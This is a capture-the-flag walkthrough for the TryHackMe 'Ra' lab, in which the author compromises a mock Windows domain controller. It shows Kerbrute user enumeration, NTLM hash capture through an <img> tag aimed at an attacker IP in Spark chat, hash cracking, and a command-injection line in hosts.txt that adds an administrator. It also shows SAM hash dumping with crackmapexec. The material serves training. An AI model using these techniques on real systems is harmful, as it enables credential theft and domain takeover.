- URL: https://tryhackme.com/room/ra
- Target OS: Windows
- Rated Difficulty: Hard
DESCRIPTION
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
ENUM >> NMAP
# Nmap 7.92 scan initiated Mon Feb 7 21:34:49 2022 as: nmap -sT -A -p 53,80,88,135,139,389,445,464,593,636,2179,3268,3269,3389,5222,5269,7070,7443,7777,9090,9091 -oN nmap_agressive 10.10.222.51
Nmap scan report for 10.10.222.51
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Windcorp.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-07 10:35:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2022-02-06T10:28:31
|_Not valid after: 2022-08-08T10:28:31
|_ssl-date: 2022-02-07T10:37:40+00:00; +47s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINDCORP
| NetBIOS_Domain_Name: WINDCORP
| NetBIOS_Computer_Name: FIRE
| DNS_Domain_Name: windcorp.thm
| DNS_Computer_Name: Fire.windcorp.thm
| DNS_Tree_Name: windcorp.thm
| Product_Version: 10.0.17763
|_ System_Time: 2022-02-07T10:37:02+00:00
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| invalid-namespace
| (timeout)
| unknown:
| compression_methods:
| xmpp:
| version: 1.0
| features:
| stream_id: alldcg4s1r
| auth_mechanisms:
|_ capabilities:
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
|_ssl-date: 2022-02-07T10:37:41+00:00; +47s from scanner time.
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| unknown:
| compression_methods:
| xmpp:
| features:
| auth_mechanisms:
|_ capabilities:
7070/tcp open http Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp open ssl/http Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
7777/tcp open socks5 (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_ No authentication
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:35:44 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:35:55 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after: 2025-04-30T08:39:00
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:36:10 GMT
| Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 07 Feb 2022 10:36:12 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 400 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
Network Distance: 2 hops
Service Info: Host: FIRE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 46s, deviation: 0s, median: 46s
| smb2-time:
| date: 2022-02-07T10:37:06
|_ start_date: N/A
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 361.67 ms 10.9.0.1
2 361.81 ms 10.10.222.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 7 21:37:11 2022 -- 1 IP address (1 host up) scanned in 142.20 seconds
- Seeing as we are dealing with a Windows domain controller (open port
88
) it would be wise to addfire.windcorp.thm
andwindcorp.thm
to local/etc/hosts
ENUM >> Userlist found in website HTML code…
- The website has a list of their "IT support-staff", and they are all XMPP links…
organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
tinygoose102
brownostrich284
sadswan869
goldencat416
whiteleopard529
happymeercat399
orangegorilla428
ENUM >> Kerbrute against harvested userlist
❯ ./kerbrute userenum --dc windcorp.thm -d windcorp.thm userlist
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/08/22 - Ronnie Flathers @ropnop
2022/02/08 01:45:11 > Using KDC(s):
2022/02/08 01:45:11 > windcorp.thm:88
2022/02/08 01:45:11 > [+] VALID USERNAME: tinygoose102@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: brownostrich284@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Edward@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Edeltraut@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: organicfish718@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: Emile@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: angrybird253@windcorp.thm
2022/02/08 01:45:11 > [+] VALID USERNAME: buse@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: goldencat416@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: happymeercat399@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: orangegorilla428@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: whiteleopard529@windcorp.thm
2022/02/08 01:45:12 > [+] VALID USERNAME: sadswan869@windcorp.thm
2022/02/08 01:45:12 > Done! Tested 15 usernames (13 valid) in 0.758 seconds
- These usernames are all well and good… but without any passwords they don’t hold much value… we need a different way in!
ENUM >> Some more users!
Turning back to the website, I decided to try and find something we could use to take advantage of the only other item on the front page that was interactable… the Reset Password
button at the top right.
Upon closer inspection of the "Employees in focus" area it became obvious that "Lily Levesque" had a favourite pet… the dog in her picture! But what about the dogs name? The name of the image in the source code gives us a big clue!
Ok that’s all great… but none of our confirmed accounts match her name! Can we guess Lily’s?
Looking at the naming on the other 2 employees listed in this section, we can see a pattern… they seem to be first name then the first 2 letters of their surname. Just in case though we will throw their first name only in as a candidate:
Re-running Kerbrute on the updated list yields us two new results…
2022/02/08 13:28:39 > [+] VALID USERNAME: Kirkug@windcorp.thm
2022/02/08 13:28:39 > [+] VALID USERNAME: Lilyle@windcorp.thm
Hello there Lilyle! 😉
PRIVESC >> reset lilyle’s password
- OK, now that we have both
Lilyle
‘s username and her dog’s name, lets give them a shot!:
- Success! We now have
Lilyle
‘s password!
ENUM >> SMBMap
- Let’s see if we get any SMB access from
Lilyle
‘s credentials:
❯ smbmap -H 10.10.173.233 -u lilyle -p ChangeMe#1234
[+] IP: 10.10.173.233:445 Name: fire.windcorp.thm
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Shared READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
LOOT >> "Flag 1.txt"
❯ smbclient -U lilyle \\\\10.10.173.233\\Shared
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 30 10:45:42 2020
.. D 0 Sat May 30 10:45:42 2020
Flag 1.txt A 45 Sat May 2 01:32:36 2020
spark_2_8_3.deb A 29526628 Sat May 30 10:45:01 2020
spark_2_8_3.dmg A 99555201 Sun May 3 21:06:58 2020
spark_2_8_3.exe A 78765568 Sun May 3 21:05:56 2020
spark_2_8_3.tar.gz A 123216290 Sun May 3 21:07:24 2020
15587583 blocks of size 4096. 10905638 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit
❯ cat Flag\ 1.txt
FLAG - Flag 1.txt
ENUM >> Spark 2.8.3
Spark is a XMPP client, linked on the main website at http://fire.windcorp.thm directly below the list of "IT support-staff". On top of this, binaries exist in the public SMB share that LilyLe
can see… this has to be a big hint!
So after installing the latest version of Spark (at the time 2.9.4) on my local machine and getting nowhere I decided to try my hand at the "suggested" version 2.8.3… First things first, after a quick google search I discovered the following CVE:
https://www.cvedetails.com/cve/CVE-2020-12772/
This pointed to the following reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
-
Quoted in the
README.md
on GitHub:When we opened a chat with another user, we could send an
<img
tag to that user with an external URL as the source of that image, like this:<img src=[external_ip]/test.img>
Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!
-
… and also:
By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).
Sounds like a plan! 🙂
-
Oh, and did I forget to mention that
theart42
who discovered this CVE was also one of the creators of this room – and they specifically reference creating a CTF with this exact vulnerability? 😉 (probably helps too that all the example images on the GitHub repo were taken directly from this CTF too) -
Firstly, go into the
Advanced
menu at the bottom of the window, and ensure that the 2 highlighted options are ticked:
- With
LilyLe
s username and password filled out, and theDomain
set towindcorp.thm
we can then hit theLogin
button:
- Boot up
responder
(e.g.responder -I tun0
) then go toActions
->Start a chat
and enterbuse
as ouraddress
(buse always seems to be online):
- Send a message with
<img src="http://<ATTACK_IP>/picture.jpg">
to Buse, then watch for the response in Responder:
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.173.233
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : <REDACTED>
CREDS - buse NetNTLMv2 hash
LOOT >> cracking buse’s NTLMv2 hash
❯ hashcat -m 5600 buse.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: BUSE::WINDCORP:6da1ec088e2f0ad5:c28f54dab3f6b4c463f...000000
Time.Started.....: Tue Feb 8 16:55:04 2022 (4 secs)
Time.Estimated...: Tue Feb 8 16:55:08 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 951.0 kH/s (3.53ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2961408/14344385 (20.65%)
Rejected.........: 0/2961408 (0.00%)
Restore.Point....: 2957312/14344385 (20.62%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: v10014318 -> utrox11
Started: Tue Feb 8 16:54:41 2022
Stopped: Tue Feb 8 16:55:09 2022
CREDS - buse
PRIVESC >> Evil-WinRM shell with buse!
❯ evil-winrm -i 10.10.180.148 -u buse -p <REDACTED>
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\buse\Documents> ls
*Evil-WinRM* PS C:\Users\buse\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\buse\Desktop> ls
Directory: C:\Users\buse\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/7/2020 3:00 AM Also stuff
d----- 5/7/2020 2:58 AM Stuff
-a---- 5/2/2020 11:53 AM 45 Flag 2.txt
-a---- 5/1/2020 8:33 AM 37 Notes.txt
*Evil-WinRM* PS C:\Users\buse\Desktop>
LOOT >> "Flag 2.txt"
*Evil-WinRM* PS C:\Users\buse\Desktop> cat "Flag 2.txt"
<REDACTED>
FLAG - Flag 2.txt
LOOT >> checkservers.ps1 in C:\scripts
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"
# start looping here
Do{
$available = $Null
$notavailable = $Null
Write-Host (Get-Date)
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
if($p)
{
# if the Host is available then just write it to the screen
write-host "Available host ---> "$_ -BackgroundColor Green -ForegroundColor White
[Array]$available += $_
}
else
{
# If the host is unavailable, give a warning to screen
write-host "Unavailable host ------------> "$_ -BackgroundColor Magenta -ForegroundColor White
$p = Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue
if(!($p))
{
# If the host is still unavailable for 4 full pings, write error and send email
write-host "Unavailable host ------------> "$_ -BackgroundColor Red -ForegroundColor White
[Array]$notavailable += $_
if ($OutageHosts -ne $Null)
{
if (!$OutageHosts.ContainsKey($_))
{
# First time down add to the list and send email
Write-Host "$_ Is not in the OutageHosts list, first time down"
$OutageHosts.Add($_,(get-date))
$Now = Get-date
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
else
{
# If the host is in the list do nothing for 1 hour and then remove from the list.
Write-Host "$_ Is in the OutageHosts list"
if (((Get-Date) - $OutageHosts.Item($_)).TotalMinutes -gt $EmailTimeOut)
{$OutageHosts.Remove($_)}
}
}
else
{
# First time down create the list and send email
Write-Host "Adding $_ to OutageHosts."
$OutageHosts = @{$_=(get-date)}
$Body = "$_ has not responded for 5 pings at $Now"
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "Host $_ is down" -SmtpServer $smtpserver
}
}
}
}
# Report to screen the details
$log = "Last run: $(Get-Date)"
write-host $log
Set-Content -Path C:\scripts\log.txt -Value $log
Write-Host "Available count:"$available.count
Write-Host "Not available count:"$notavailable.count
Write-Host "Not available hosts:"
$OutageHosts
Write-Host ""
Write-Host "Sleeping $SleepTimeOut seconds"
sleep $SleepTimeOut
if ($OutageHosts.Count -gt $MaxOutageCount)
{
# If there are more than a certain number of host down in an hour abort the script.
$Exit = $True
$body = $OutageHosts | Out-String
Send-MailMessage -Body "$body" -to $notificationto -from $notificationfrom `
-Subject "More than $MaxOutageCount Hosts down, monitoring aborted" -SmtpServer $smtpServer
}
}
while ($Exit -ne $True)
PRIVESC >> using checkservers.ps1 to gain Administrator
OK, so the powershell loot above seems like a massive chunk of script to take in… and you’d be right! The basic idea is that it uses Test-Connection
to make connection to outside websites like google.com
to see if the server has connection to the outside, if not it reports it.
However, there is one important bit that we care about at the very start of the code (after the variables):
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
ForEach-Object {
$p = "Test-Connection -ComputerName $_ -Count 1 -ea silentlycontinue"
Invoke-Expression $p
Basically that script is grabbing the any line of C:\Users\brittanycr\hosts.txt
that is not a comment (e.g. a line starts with #
) and passing it to Test-Connection
via Invoke-Expression
…
We can also tell by watching log.txt
that this script is called every minute…
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:06:26
*Evil-WinRM* PS C:\Scripts> cat log.txt
Last run: 02/08/2022 20:07:11
So, with a carefully crafted hosts.txt
, checkservers.ps1
might lead us to SYSTEM…
- But we need access to
brittnaycr
‘s home directory to write it…
*Evil-WinRM* PS C:\scripts> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================ ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
- Because we are a part of the
Account Operators
group, we do have limited access to modify standard users accounts… most importantly – changing their password!
*Evil-WinRM* PS C:\scripts> net user brittanycr hax0r3d! /domain
The command completed successfully.
- Now we simply create a new
hosts.txt
file with the following contents:
;net user stimpz0r r00t3d! /add;net localgroup Administrators stimpz0r /add
- Connect to SMB via
brittnaycr
‘s account and upload the modifiedhosts.txt
:
❯ smbclient -U brittanycr \\\\10.10.135.16\\Users
Enter WORKGROUP\brittanycr's password:
Try "help" to get a list of possible commands.
smb: \> cd brittanycr
smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \brittanycr\>
- Then sit back and watch! 😉
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:11
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
User stimpz0r was not found.
At line:1 char:1
+ Get-LocalUser "stimpz0r"
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (stimpz0r:String) [Get-LocalUser], UserNotFoundException
+ FullyQualifiedErrorId : UserNotFound,Microsoft.PowerShell.Commands.GetLocalUserCommand
*Evil-WinRM* PS C:\scripts> cat log.txt
Last run: 02/08/2022 19:23:56
*Evil-WinRM* PS C:\scripts> Get-LocalUser "stimpz0r"
Name Enabled Description
---- ------- -----------
stimpz0r True
- Finally, lets test out our new access:
❯ evil-winrm -i windcorp.thm -u stimpz0r -p r00t3d!
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami
windcorp\stimpz0r
*Evil-WinRM* PS C:\Users\stimpz0r\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
- We are here for one last thing (flag)…
LOOT >> Flag3.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat Flag3.txt
<REDACTED>
FLAG - Flag3.txt
PRIVESC? >> that juicy Administrator password…
- I managed to extract the NTLM hash from the
Administrator
account using CrackMapExec:
❯ crackmapexec smb 10.10.26.119 -u stimpz0r -p r00t3d! --sam
SMB 10.10.26.119 445 FIRE [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.119 445 FIRE [+] windcorp.thm\stimpz0r:r00t3d! (Pwn3d!)
SMB 10.10.26.119 445 FIRE [+] Dumping SAM hashes
SMB 10.10.26.119 445 FIRE Administrator:500:aad3b435b51404eeaad3b435b51404ee:a47c1e6ce2d356a67cde3a743b465b16:::
SMB 10.10.26.119 445 FIRE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.26.119 445 FIRE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ERROR:root:SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
SMB 10.10.26.119 445 FIRE [+] Added 3 SAM hashes to the database
- And, Crackstation manged to crack the hash:
- BUT – no dice… 🙁
❯ crackmapexec smb 10.10.26.119 -u Administrator -p Secret1234
SMB 10.10.26.119 445 FIRE [*] Windows 10.0 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB 10.10.26.119 445 FIRE [-] windcorp.thm\Administrator:Secret1234 STATUS_LOGON_FAILURE
❯ crackmapexec winrm 10.10.26.119 -u Administrator -H a47c1e6ce2d356a67cde3a743b465b16
WINRM 10.10.26.119 5985 FIRE [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm)
WINRM 10.10.26.119 5985 FIRE [*] http://10.10.26.119:5985/wsman
WINRM 10.10.26.119 5985 FIRE [-] windcorp.thm\Administrator:a47c1e6ce2d356a67cde3a743b465b16
❯ evil-winrm -i windcorp.thm -u Administrator -p Secret1234
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1